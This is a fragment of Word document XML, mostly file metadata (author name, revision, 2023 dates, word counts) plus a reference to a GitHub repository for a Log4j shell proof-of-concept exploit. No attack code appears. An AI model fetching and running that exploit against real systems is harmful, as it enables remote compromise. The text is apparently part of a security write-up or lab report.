          <w:marLeft w:val="3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github.com/kozmer/log4j-shell-po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kozmer/log4j-shell-p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387</Words>
  <Characters>2210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koid qiantong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>koid qiantong</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-20T11:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-20T12:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>